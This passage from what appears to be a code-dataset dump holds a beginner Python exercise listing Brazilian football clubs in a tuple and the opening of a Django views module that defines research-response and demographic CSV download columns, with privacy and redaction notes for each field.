] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | '''
Crie uma tupla preenchida com os 20 times do brasileirão da série A na ordem de colocação.
Depois mostre:
a: Os 5 primeiros colocados
b: Os últimos 4 colocados
c: times em ordem alfabética
d: em que posição está o time da Chapecoense?
'''
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| 45.705882 | 92 | 0.683398 |
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| true | true |
f72edb8b6c0044eda2bec7da52e82df5b9432d92 | 80,572 | py | Python | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 9 | 2018-06-26T17:15:27.000Z | 2021-11-21T17:19:01.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 496 | 2018-02-19T19:18:24.000Z | 2022-03-31T17:01:16.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 16 | 2018-07-06T23:35:39.000Z | 2021-11-21T17:52:58.000Z | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
# id: Unique key to identify data. Used as CSV column header and any portion before __ is used to create a
# sub-dictionary for JSON data.
id: str
description: str # Description for data dictionary
extractor: Callable[
[Union[Response, Dict]], Union[str, List]
] # Function to extract value from response instance or dict
optional: bool = False # is a column the user checks a box to include?
name: str = "" # used in template form for optional columns
include_by_default: bool = False # whether to initially check checkbox for field
identifiable: bool = False # used to determine filename signaling
# Columns for response downloads. Extractor functions expect Response instance
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
col.id
for col in RESPONSE_COLUMNS
if col.id.startswith("child__") or col.id.startswith("participant__")
]
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
selected_header_ids: Union[Set, List],
all_available_header_ids: Union[Set, KeysView],
) -> List:
"""Get ordered list of response headers for download.
Select and order the appropriate headers to include in a file download, based on
which optional headers are selected and which headers are available.
Args:
selected_header_ids: which optional headers to include (corresponding to id values in
RESPONSE_COLUMNS). Headers that are specified as optional in RESPONSE_COLUMNS will
only be included if listed in selected_header_ids.
all_available_header_ids: all header ids we have data for. Any header ids that are in
this set but not in RESPONSE_COLUMNS will be added to the end of the output list.
Returns:
List of headers to include, consisting of the following in order:
1) Headers in RESPONSE_COLUMNS, in order, omitting any that are optional and were not selected
2) Extra headers from all_available_header_ids not included in (1), in alpha order
"""
unselected_optional_ids = {
col.id
for col in RESPONSE_COLUMNS
if col.optional and col.id not in selected_header_ids
}
selected_standard_header_ids = [
col.id
for col in RESPONSE_COLUMNS[0:-2]
if col.id not in unselected_optional_ids
]
return selected_standard_header_ids + sorted(
list(
all_available_header_ids
- set(selected_standard_header_ids)
- unselected_optional_ids
)
)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
"""Get ordered list of demographic headers for download.
Args:
selected_header_ids(set or list): which optional headers to include (corresponding
to id values in DEMOGRAPHIC_COLUMNS).
Returns:
Ordered list of headers to include in download
Headers are id values from DEMOGRAPHIC_COLUMNS in order, omitting any that are optional
and were not included in selected_header_ids.
"""
if selected_header_ids is None:
selected_header_ids = {}
return [
col.id
for col in DEMOGRAPHIC_COLUMNS
if col.id in selected_header_ids or not col.optional
]
def construct_response_dictionary(
resp, columns, optional_headers, include_exp_data=True
):
if optional_headers is None:
optional_headers = {}
resp_dict = {}
for col in columns:
if col.id in optional_headers or not col.optional:
try:
object_name, field_name = col.id.split("__")
if object_name in resp_dict:
resp_dict[object_name][field_name] = col.extractor(resp)
else:
resp_dict[object_name] = {field_name: col.extractor(resp)}
except ValueError:
resp_dict[col.id] = col.extractor(resp)
# Include exp_data field in dictionary?
if include_exp_data:
resp_dict["exp_data"] = resp.exp_data
return resp_dict
class FrameDataRow(NamedTuple):
response_uuid: str
child_hashed_id: str
frame_id: str
event_number: str
key: str
value: str
FRAME_DATA_HEADER_DESCRIPTIONS = {
"response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
"child_hashed_id": (
"Hashed identifier for the child associated with this response; can be matched to summary data "
"child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
"need to match children across multiple studies, use the child_global_id."
),
"frame_id": (
"Identifier for the particular frame responsible for this data; matches up to an element in the "
"response_sequence in the summary data file"
),
"event_number": (
"Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
"frame (and within global data) within each response. Blank for non-event data."
),
"key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
"value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
"""Get list of data stored in response's exp_data and global_event_timings fields.
Args:
resp(Response or dict): response data to process. If dict, must contain fields
child__uuid, study__uuid, study__salt, study__hash_digits, uuid, exp_data, and
global_event_timings.
Returns:
List of FrameDataRows each representing a single piece of data from global_event_timings or
exp_data. Descriptions of each field of the FrameDataRow are given in FRAME_DATA_HEADER_DESCRIPTIONS.
"""
if type(resp) is not dict:
resp = {
"child__uuid": resp.child.uuid,
"study__uuid": resp.study.uuid,
"study__salt": resp.study.salt,
"study__hash_digits": resp.study.hash_digits,
"uuid": resp.uuid,
"exp_data": resp.exp_data,
"global_event_timings": resp.global_event_timings,
}
frame_data_tuples = []
child_hashed_id = hash_id(
resp["child__uuid"],
resp["study__uuid"],
resp["study__salt"],
resp["study__hash_digits"],
)
# First add all of the global event timings as events with frame_id "global"
for (iEvent, event) in enumerate(resp["global_event_timings"]):
for (key, value) in event.items():
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id="global",
key=key,
event_number=str(iEvent),
value=value,
)
)
# Next add all data in exp_data
event_prefix = "eventTimings."
for frame_id, frame_data in resp["exp_data"].items():
for (key, value) in flatten_dict(frame_data).items():
# Process event data separately and include event_number within frame
if key.startswith(event_prefix):
key_pieces = key.split(".")
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=".".join(key_pieces[2:]),
event_number=str(key_pieces[1]),
value=value,
)
)
# omit frameType values from CSV
elif key == "frameType":
continue
# Omit the DOB from any exit survey
elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
continue
# Omit empty generatedProperties values from CSV
elif key == "generatedProperties" and not value:
continue
# For all other data, create a regular entry with frame_id and no event #
else:
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=key,
event_number="",
value=value,
)
)
return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
    """Write a template frame-level data dictionary, as CSV rows, to `writer`.

    First scans every response's frame data to collect all frame ids (with the
    leading ordinal stripped), all per-frame keys, and all event keys that
    occur anywhere in `responses`. Then writes one row per header, per frame,
    per (frame, key) pair, and per event key. Known event keys get stock
    descriptions; everything else gets a "RESEARCHER: INSERT ..." placeholder
    for the researcher to fill in.

    Args:
        writer: a csv DictWriter; from usage below its fieldnames must include
            'column', 'description', 'possible_frame_id', 'frame_description',
            'possible_key', and 'key_description' (assumed — confirm with caller).
        responses: queryset (or sequence) of responses to scan; paginated so we
            never hold more than RESPONSE_PAGE_SIZE responses in memory.
    """
    response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
    unique_frame_ids = set()
    event_keys = set()
    unique_frame_keys_dict = {}
    # Pass 1: accumulate every frame id, per-frame (non-event) key, and event key seen.
    for page_num in response_paginator.page_range:
        page_of_responses = response_paginator.page(page_num)
        for resp in page_of_responses:
            this_resp_data = get_frame_data(resp)
            # Frame ids look like "<ordinal>-<frame-name>"; strip the ordinal so
            # e.g. "1-video-config" and "3-video-config" collapse to one entry.
            these_ids = {
                d.frame_id.partition("-")[2]
                for d in this_resp_data
                if not d.frame_id == "global"
            }
            # Rows carrying an event_number are event data; collect their keys separately.
            event_keys = event_keys | {
                d.key for d in this_resp_data if d.event_number != ""
            }
            unique_frame_ids = unique_frame_ids | these_ids
            for frame_id in these_ids:
                # Non-event keys observed for this particular frame name.
                these_keys = {
                    d.key
                    for d in this_resp_data
                    if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
                }
                if frame_id in unique_frame_keys_dict:
                    unique_frame_keys_dict[frame_id] = (
                        unique_frame_keys_dict[frame_id] | these_keys
                    )
                else:
                    unique_frame_keys_dict[frame_id] = these_keys
    # Start with general descriptions of high-level headers (child_id, response_id, etc.)
    writer.writerows(
        [
            {"column": header, "description": description}
            for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
        ]
    )
    writer.writerow(
        {
            "possible_frame_id": "global",
            "frame_description": "Data not associated with a particular frame",
        }
    )
    # Add placeholders to describe each frame type
    unique_frame_ids = sorted(list(unique_frame_ids))
    for frame_id in unique_frame_ids:
        writer.writerow(
            {
                "possible_frame_id": "*-" + frame_id,
                "frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
            }
        )
        unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
        for k in unique_frame_keys:
            writer.writerow(
                {
                    "possible_frame_id": "*-" + frame_id,
                    "possible_key": k,
                    "key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
                }
            )
    # Finally, one row per event key, with stock descriptions where we have them.
    event_keys = sorted(list(event_keys))
    event_key_stock_descriptions = {
        "eventType": (
            "Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
            "cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
            "or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
            "find a list of events recorded by each frame in the frame documentation at "
            "https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
        ),
        "exitType": (
            "Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
        ),
        "lastPageSeen": (
            "Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
        ),
        "pipeId": (
            "Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
            "useful for troubleshooting in rare cases."
        ),
        "streamTime": (
            "Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
            "video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
        ),
        "timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
        "videoId": (
            "Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
            "currently being recorded."
        ),
    }
    for k in event_keys:
        writer.writerow(
            {
                "possible_frame_id": "any (event data)",
                "possible_key": k,
                "key_description": event_key_stock_descriptions.get(
                    k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
                ),
            }
        )
def build_single_response_framedata_csv(response):
    """Return CSV text containing the frame-level data for one response.

    Used both when assembling the zip archive of all response data and for
    the individual-file downloads offered on the single-response view.
    """
    buffer, csv_writer = csv_namedtuple_writer(FrameDataRow)
    csv_writer.writerows(get_frame_data(response))
    return buffer.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin supplying the queryset of responses a researcher may download."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        # Only responses this researcher is permitted to see.
        accessible = self.study.responses_for_researcher(self.request.user)
        return accessible.order_by(self.get_ordering())
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    # Mixin providing the queryset shared by the demographic-data download views.
    model = Response
    paginate_by = 10
    ordering = "id"
    def get_queryset(self):
        """
        Return responses (restricted to those this researcher may view) as flat
        dicts of response + demographic-snapshot fields. The .values() call
        means the download views work with plain dicts, not model instances.
        """
        study = self.study
        return (
            study.responses_for_researcher(self.request.user)
            .order_by(self.get_ordering())
            .select_related("child", "child__user", "study", "demographic_snapshot")
            .values(
                "uuid",
                "date_created",
                "child__user__uuid",
                "study__uuid",
